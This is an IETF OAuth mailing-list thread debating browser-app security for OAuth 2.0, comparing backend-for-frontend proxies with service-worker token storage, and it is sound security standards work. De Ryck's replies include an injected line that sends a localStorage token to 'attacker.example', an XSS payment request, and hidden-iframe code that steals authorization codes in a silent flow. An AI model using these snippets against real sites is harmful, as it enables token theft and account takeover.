You can write your code to be as strong as you wish. You cannot determine
whether the code running on the user's machine is that code, running unaltered. ..tom


On Sun, Aug 27, 2023 at 5:25 AM Yannick Majoros <yann...@valuya.be> wrote:

> Thanks for taking the time to respond and for the constructive feedback.
>
> Still, there is an incorrect initial premise that makes the rest of the
> discussion complicated, and partly wrong.
>
> Specifically, §6.4.2.1 says this: *The service worker MUST NOT transmit
> tokens, authorization codes or PKCE code verifier to the frontend
> application.*
>
> The wording should be refined, but the idea is that the service worker
> actually prevents authorization codes from ever reaching the frontend. That
> may sound easier said than done, but this part happens to be quite easy to
> implement.
>
> This further impacts many of the other statements:
> *> The main problem with a browser-only client is that the attacker with
> control over the client has the ability to run a silent Authorization Code
> flow, which provides them with an independent set of tokens*
> [...]
> *> **The security differences between a BFF and a browser-only app are
> not about token storage, but about the attacker being able to run a new
> flow to obtain tokens.*
> [...]
> *> Again, the security benefits of a BFF are not about token storage.
> Even if you find the perfect storage solution for non-extractable tokens in
> the browser, an attacker still controls the client application and can
> simply request a new set of tokens. *
>
> Truth is: no, you can't start a new authorization flow and get the
> authorization code back in the main thread. I'm talking about the
> redirection scenario, which I'm most familiar with, but it would
> probably apply to the "message" one as well (which is new to me and seems
> to be astonishingly legit due to the vague "for example" wording in the OAuth2
> spec :-) ).
>
> The service worker, as described at
> https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorkerGlobalScope/fetch_event#description
> , simply intercepts the authorization code, exchanges it for a token, and
> never sends either back to the main thread.
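>
> To make this concrete, here is a minimal sketch of such a worker. The paths,
> the client_id, the token endpoint and the loadVerifier() helper are all
> illustrative assumptions of mine, not a reference implementation:
>
>     // sw.ts -- minimal sketch, not production code
>     declare const self: ServiceWorkerGlobalScope;
>     declare function loadVerifier(): Promise<string>; // hypothetical helper: the
>                                                        // worker generated the PKCE pair
>
>     let accessToken: string | undefined; // lives only in the worker scope
>
>     self.addEventListener('fetch', (event: FetchEvent) => {
>       const url = new URL(event.request.url);
>       // Intercept the redirect URI: the code never reaches the main thread.
>       if (url.pathname === '/callback' && url.searchParams.has('code')) {
>         event.respondWith((async () => {
>           const body = new URLSearchParams({
>             grant_type: 'authorization_code',
>             code: url.searchParams.get('code')!,
>             redirect_uri: url.origin + '/callback',
>             client_id: 'my-spa',                 // illustrative
>             code_verifier: await loadVerifier(),
>           });
>           const res = await fetch('https://as.example/token', { method: 'POST', body });
>           accessToken = (await res.json()).access_token;
>           // Serve the app shell instead of exposing the code to the page.
>           return Response.redirect('/', 303);
>         })());
>       }
>     });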
>
> But don't take my word for it: what about demonstrating our claims with
> actual code, and thereby creating a shorter, simpler, but more constructive
> discussion?
>
> The demonstration in its current form would not lead to a successful
> compromise of a good implementation in which access tokens are handled by a
> service worker.
>
> Yannick
>
>
> On Sat, Aug 26, 2023 at 2:20 PM Philippe De Ryck <
> phili...@pragmaticwebsecurity.com> wrote:
>
>> My responses inline.
>>
>>
>> Hi everyone,
>>
>> The document is about "OAuth 2.0 for Browser-Based Apps". Its abstract
>> further explains that it "details the security considerations and best
>> practices that must be taken into account when developing browser-based
>> applications that use OAuth 2.0.".
>>
>> As such, detailing security considerations is important. I share the
>> point of view that basing web applications on proven concepts matters.
>> The approaches detailed in the document all have their advantages
>> and disadvantages.
>>
>>
>> We have discussed the topic of browser-based apps in depth at the OAuth
>> Security Workshop last week. I am also working with Aaron Parecki on
>> updating the specification to more accurately reflect these advantages and
>> disadvantages. Updates will go out in the coming days/weeks, so we more
>> than welcome concrete feedback on the content there.
>>
>> There are two main approaches to browser-based application security. One
>> of them is to store security credentials in the frontend. The other is
>> to use cookies and a BFF. Though the latter is common practice, neither is
>> demonstrably more secure in any fundamental way. Different
>> approaches, different characteristics and security assumptions. Nobody can
>> prove that either approach is better, just that there are different
>> concerns.
>>
>> Handling security in a BFF relies on cookies that cannot be read by the
>> JavaScript application. This mechanism provides reliable protection for
>> the cookie itself, which is used as a kind of credential to access
>> confidential web resources. It obviously demands additional layers in
>> the flow (a proxy or a light server). You also need a mechanism to share
>> session information, either on the server side, or for example by having
>> the cookie itself hold that information. A bigger concern to me is that you
>> basically give up standard mechanisms for securing the flow between the
>> frontend and the backend: the security between the two is a custom,
>> cookie-based solution that is in no way OAuth or otherwise standardized.
>> This solves the problem by not using OAuth at all in
>> the browser part of the application, basically making the client
>> purely a backend application. However, the claim that browser-based
>> applications cannot be secured with OAuth isn't universally true; it
>> strongly depends on one's definition of "secure", and basically comes down
>> to what the security issue actually is.
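>>
>> To illustrate the kind of extra layer and custom glue I mean, here is a
>> rough sketch, assuming an Express-style Node backend with a server-side
>> session and an /api prefix. All names and endpoints are illustrative, and
>> the code exchange, request bodies and error handling are omitted:
>>
>>     // bff.ts -- rough sketch of the extra layer, not a complete BFF
>>     import express from 'express';
>>     import session from 'express-session';
>>
>>     const app = express();
>>     // HttpOnly session cookie: the frontend JS never sees a token.
>>     app.use(session({
>>       secret: 'change-me',
>>       cookie: { httpOnly: true, sameSite: 'lax', secure: true },
>>     }));
>>
>>     // Custom, non-OAuth glue between frontend and backend: cookie in, token out.
>>     app.use('/api', async (req, res) => {
>>       const tokens = (req.session as any).tokens; // stored after the code exchange
>>       if (!tokens) return res.status(401).end();
>>       const upstream = await fetch('https://rs.example' + req.url, { // Node 18+ global fetch
>>         method: req.method,
>>         headers: { authorization: `Bearer ${tokens.access_token}` },
>>       });
>>       res.status(upstream.status).send(await upstream.text());
>>     });
>>
>>     app.listen(3000);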
>>
>>
>> The updated specification will clearly outline the security
>> considerations when making the browser-based application a public OAuth
>> client.
>>
>> *The main problem with a browser-only client is that the attacker with
>> control over the client has the ability to run a silent Authorization Code
>> flow, which provides them with an independent set of tokens.* These
>> tokens give the attacker long-term and unrestricted access in the name of
>> the user. A BFF-based architecture does not suffer from this issue, since
>> the OAuth client is a confidential client. Regardless of one’s definition
>> of “secure”, this is a clear difference in the achievable level of
>> security.
>>
>> Of course, as stated multiple times before, the use of a BFF does not
>> eliminate the presence of the malicious JS, nor does it solve all abuse
>> scenarios.
>>
>>
>>
>> Storing tokens at the frontend has advantages: it solves my concern above
>> about a standards-based flow between the frontend and the backend.
>>
>>
>> The use of cookies is a core building block of the web, and is quite
>> standard.
>>
>> It's simpler from an operational point of view. And it's been used in the
>> wild for ages.
>>
>>
>> Anyone using a browser-only client should be informed about the clear and
>> significant dangers of this approach, which the updated specification will
>> do.
>>
>>
>> Both flows have been compromised numerous times. This doesn't mean they
>> are wrong by design, but that the specific security concerns have to be
>> addressed.
>>
>>
>> If you have specific security concerns about a BFF, I’d suggest raising
>> them. Until now, I have only seen arguments that highlight the additional
>> effort it takes to implement a BFF, but nothing to undermine its security.
>> Plenty of highly sensitive applications in the healthcare and financial
>> industry opt for a BFF for its improved security properties and consider
>> this trade-off to be favorable.
>>
>>
>> Now, the concern we are really discussing is what happens in case of
>> XSS or any other form of malicious JavaScript.
>>
>> In this case, for all known flows, session riding is the first real
>> issue. Whether the injected code calls protected web resources through the
>> BFF or using the stored tokens is irrelevant: the evil is done. Seeing
>> different threat levels in token abuse versus session riding is a logical
>> shortcut: in many cases, the impact will be exactly the same.
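>>
>> As an illustration, injected code can do the same damage in either model;
>> the endpoint and payload below are made up:
>>
>>     // Injected script running in the user's browser.
>>     // With a BFF: the browser attaches the HttpOnly session cookie itself.
>>     fetch('/api/payments', {
>>       method: 'POST',
>>       credentials: 'include',
>>       headers: { 'content-type': 'application/json' },
>>       body: JSON.stringify({ to: 'attacker-iban', amount: 1000 }),
>>     });
>>     // With frontend-stored tokens: the injected code simply reuses whatever
>>     // the application itself uses (e.g. its own fetch wrapper) for the same call.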
>>
>>
>> Stating that using stolen tokens is the same as sending requests through
>> a compromised client in the user’s browser (client hijacking) is
>> categorically false. Here are two concrete differences:
>>
>>
>>    - Stolen refresh tokens give an attacker long-term access in the name
>>    of the user. Client hijacking only works as long as the user’s browser is
>>    online and the client is effectively running.
>>    - Stolen access tokens give an attacker unfettered access to any
>>    resource server that accepts them. Client hijacking forces the attacker to
>>    play by the rules of the client. For example, an attacker can abuse a
>>    stolen token with fake origin headers to access a resource server that
>>    would accept the token, but has a CORS policy that rejects requests from
>>    the client’s origin.
>>
>>
>> As stated before, the DPoP specification takes a similar point of view on
>> these consequences. They explicitly aim to prevent the abuse of stolen
>> tokens, while considering client hijacking to be out of scope (
>> https://datatracker.ietf.org/doc/html/draft-ietf-oauth-dpop#name-objectives
>> )
>>
>>
>> On a sidenote, the term “session riding” seems to refer to CSRF, not to
>> client hijacking. I have only learned this myself recently and have
>> mis-used this term before as well. I wanted to point this out to avoid
>> further confusion.
>>
>>
>>
>> Reducing the attack surface with a BFF or even a simple proxy is a
>> possible but separate topic: it doesn't have to be linked to where tokens
>> are stored. Alternatively, services that shouldn't be accessible could
>> simply not be exposed, and token scope and audience must be well thought out.
>>
>> As such, BFFs as well as frontend token storage, though different, are
>> application design choices and have no demonstrable superiority from a
>> security point of view.
>>
>>
>> *The security differences between a BFF and a browser-only app are not
>> about token storage, but about the attacker being able to run a new flow to
>> obtain tokens.*
>>
>> You also talk about “demonstrable” differences. I have shown examples
>> (both in text and video) of these consequences in browser-only apps,
>> resulting in the attacker obtaining both an access token and a refresh
>> token. If you claim that BFFs are just the same, I invite you to
>> demonstrate your point of view.
>>
>>
>> Still, it seems it matters to some people to not exfiltrate tokens in
>> case of successful XSS. In the first instance, I don't share this need to
>> protect short-lived tokens in a game over scenario, but the whole
>> investigation of more secure frontend storage mechanisms started because
>> some customers are concerned. We are in the realm of choice, not of
>> provable security need, but it is still important to them.
>>
>> Documenting security concerns and possible solutions is part of the
>> document's purpose. Where you store the tokens has an impact on how easy it
>> will be for an attacker to exfiltrate them. Local or session storage is
>> obviously not the best choice here, as injected JavaScript can easily
>> access it.
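>>
>> With tokens in Web Storage, for instance, a single injected statement is
>> enough to ship them off (the storage key and the attacker URL are obviously
>> made up):
>>
>>     // Injected code: read the token and exfiltrate it.
>>     navigator.sendBeacon(
>>       'https://attacker.example/collect',
>>       localStorage.getItem('access_token') ?? '',
>>     );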
>>
>>
>> Again, the security benefits of a BFF are not about token storage. Even
>> if you find the perfect storage solution for non-extractable tokens in the
>> browser, an attacker still controls the client application and can simply
>> request a new set of tokens.
>>
>> This link points to the exact demo scenario in the video I have
>> referenced before: https://youtu.be/OpFN6gmct8c?feature=shared&t=1366 It
>> clearly shows how the attacker runs a new flow to obtain tokens, without
>> ever touching the application’s tokens.
>>
>>
>> A service worker is an interesting place to store them, as it can
>> additionally play the role of a front-end proxy that both holds the tokens
>> securely and securely proxies requests to the resource server. Besides, a
>> track was started with Rifaat to initiate changes to the service worker
>> specifications to make some things simpler.
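>>
>> The proxying part is just another branch in the worker's fetch handler. A
>> minimal sketch, assuming the worker already holds the access token in a
>> worker-scoped variable after the code exchange; the resource server origin
>> below is illustrative:
>>
>>     // Inside the same service worker that performed the code exchange.
>>     declare const self: ServiceWorkerGlobalScope;
>>     let accessToken: string | undefined; // set by the code-exchange handler
>>
>>     self.addEventListener('fetch', (event: FetchEvent) => {
>>       const url = new URL(event.request.url);
>>       // Attach the token only for the resource server; the page never sees it.
>>       if (url.origin === 'https://rs.example' && accessToken) {
>>         const headers = new Headers(event.request.headers);
>>         headers.set('authorization', `Bearer ${accessToken}`);
>>         event.respondWith(fetch(new Request(event.request, { headers })));
>>       }
>>     });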
>>
>> The point that the service worker solution isn't that widespread is
>> indeed correct and should be addressed. I propose transparently mentioning
>> that it is seen as a possible but uncommon storage mechanism. There should
>> also be some explanation about other kinds of web workers, which are more
>> commonly used but exploitable, so less secure when token exfiltration is a
>> concern. The document isn't only about security best practices, though, but
>> about security concerns. Implementations are explicitly out of scope.
>>
>>
>> Using a SW for storage does not solve anything, since the attacker can
>> simply request fresh tokens.
>>
>>
>> My conclusion is that, though we can surely make the document better,
>> there is no all-encompassing solution. Similarly, BFFs are not
>> a higher level of security for healthcare or banks, just a different
>> solution. Service workers are still an interesting solution for people who
>> absolutely want to secure tokens at the frontend, and however improvable
>> the document is, they shouldn't be left out.
>>
>>
>> You, as the creator of the SW approach, have clearly stated that you
>> don’t even use it in practice, so I don’t really understand the urge to
>> make this a recommended pattern. On the contrary, BFFs are used in practice
>> in a variety of scenarios.
>>
>> That said, the SW approach should indeed be mentioned in the document, to
>> clearly illustrate the security considerations and limitations.
>>
>>
>>
>>
>> About some specific concerns:
>> > *While content injection attacks are still possible, the BFF limits
>> the attacker’s ability to abuse APIs by constraining access through a
>> well-defined interface to the backend which eliminates the possibility of
>> arbitrary API calls.*
>> Session riding is still the main issue and isn't addressed at all. If the
>> intention here was to limit the number of exposed endpoints, the
>> application can still be designed to either only expose what is needed, or
>> to put a proxy or API manager in between to limit exposure, unrelated to
>> where the tokens are stored.
>>
>>
>> No-one has ever stated that a BFF would solve the consequences of an
>> attacker hijacking a client. However, when the attacker is forced to launch
>> attacks through a client running in the user’s browser, they are forced to
>> go through the BFF. That gives you a point of control which you *could* use
>> to implement restrictions. This is not required to benefit from a BFF,
>> since the main benefit is moving from a public client to a confidential
>> client.
>>
>> You state that you can achieve the same by using a careful design of the
>> application. However, you fail to mention what you consider the
>> “application” and where exactly this restriction fits in. This is
>> important, because once the attacker has exfiltrated access tokens, they
>> can send arbitrary requests. If the resource servers are not fully shielded
>> by an API manager, the attacker can contact them directly with a stolen
>> token. And if you apply this close to the resource servers, how will you
>> then configure them to only allow certain clients to access certain
>> endpoints?
>>
>>
>> *> No, because running a silent flow in an iframe typically uses a web
>> message response. In essence, the callback is not the redirect URI, but a
>> minimal JS page that sends the code to the main application context using
>> the web messaging mechanism. The message will have the origin of the
>> authorization server as a sender. *
>> The iframe needs to get the auth code somehow, and that typically happens
>> by setting its src to the auth endpoint and having a redirect URI that
>> points to that minimal JS page. This would mean an attacker can change the
>> redirect URI to point to some custom JS in the application,
>> which is a whole different issue.
>>
>> Philippe, I'm honestly quite skeptical about that attack, but it sounds
>> interesting. Can you provide some details or a reproducer?
>>
>>
>> In all honesty, my understanding that the Web Messaging approach was
>> universally used turned out to be inaccurate. There are two concrete ways
>> to run a silent authorization code flow: (1) using
>> response_mode=web_message and (2) using the proper redirect URI. Both
>> scenarios allow the attacker to obtain the authorization code by starting
>> the flow with an authorization request that *is indistinguishable* from
>> a request coming from the legitimate application.
>>
>> *Scenario 1 (web messaging)*
>>
>>
>>    - The iframe src points to the authorize endpoint
>>    - The AS does not redirect, but responds with an HTML page containing
>>    JS code. This JS code uses postMessage to send a message containing the
>>    authorization code to the main application context.
>>    - The attacker receives this message and obtains the authorization
>>    code
>>
>>
>> This approach is used by Auth0 and Apple. I have tested my attack
>> scenario against Auth0. Note that while this flow *does not use* the
>> redirect URI, it does validate the provided redirect URI. Additionally, the
>> admin needs to configure the AS to include the client’s origin in a list of
>> “Allowed Web Origins”.
>>
>> This is also the scenario I use in the demo I have linked to above, so
>> you can see it in action there.
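>>
>> Roughly, the attack code for this scenario looks like the sketch below. The
>> client_id, the AS endpoints and the exact shape of the message payload are
>> placeholders and depend on the AS; the token request itself is elided:
>>
>>     // Malicious code injected into the legitimate application's origin.
>>     window.addEventListener('message', (e: MessageEvent) => {
>>       if (e.origin !== 'https://as.example') return;
>>       const code = e.data?.response?.code; // exact payload shape depends on the AS
>>       if (code) {
>>         // Redeem the code with the attacker's own PKCE verifier.
>>         // ... POST to https://as.example/token ...
>>       }
>>     });
>>
>>     const frame = document.createElement('iframe');
>>     frame.style.display = 'none';
>>     frame.src = 'https://as.example/authorize'
>>       + '?client_id=legit-client&response_type=code'
>>       + '&redirect_uri=' + encodeURIComponent(location.origin + '/callback')
>>       + '&response_mode=web_message&prompt=none'
>>       + '&code_challenge=...&code_challenge_method=S256'; // attacker-generated pair
>>     document.body.appendChild(frame);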
>>
>>
>> *Scenario 2 (redirect)*
>>
>>
>>    - The iframe src points to the authorize endpoint
>>    - The AS redirects the frame to the application’s callback with the
>>    authorization code as a query parameter
>>    - The attacker can monitor the iframe for a URL that contains the
>>    authorization code, stop the frame from loading (and redeeming the
>>    authorization code), and extract the code
>>
>>
>> This approach is more universal, but just as vulnerable. The scenario is
>> exactly the same as in the demo linked to above, but the attack code looks
>> slightly different.
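>>
>> For this variant, the hidden iframe is created exactly as above, just
>> without response_mode=web_message. A sketch of the monitoring part (again
>> only a sketch, with the token request elided):
>>
>>     // Once the AS redirects the frame back to the app's own origin,
>>     // its URL becomes readable from the parent.
>>     const poll = setInterval(() => {
>>       try {
>>         const href = frame.contentWindow!.location.href; // throws while cross-origin
>>         const code = new URL(href).searchParams.get('code');
>>         if (code) {
>>           clearInterval(poll);
>>           frame.contentWindow!.stop(); // keep the app's callback from redeeming it
>>           // ... redeem the code as in scenario 1 ...
>>         }
>>       } catch {
>>         // Frame is still on the AS origin; keep polling.
>>       }
>>     }, 50);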
>>
>>
>>
>> To conclude, I have carefully argued my point of view on this mailing
>> list, in recorded videos, and in the sessions at the OAuth Security
>> Workshop last week. As far as I can tell, the experts in the community
>> acknowledge the dangers of browser-only apps (i.e., the attacker running a
>> silent flow)  and agree that the browser-based apps BCP should accurately
>> reflect this information. We’re currently working on updating the
>> specification (which will happen in multiple steps, so we ask for a bit of
>> patience).
>>
>> Unless you have anything new to add or any new issues to raise, I
>> respectfully opt to disengage from further discussion.
>>
>> Kind regards
>>
>> Philippe
>>
>>
>
> --
> Yannick Majoros
> Valuya sprl
>
_______________________________________________
OAuth mailing list
OAuth@ietf.org
https://www.ietf.org/mailman/listinfo/oauth
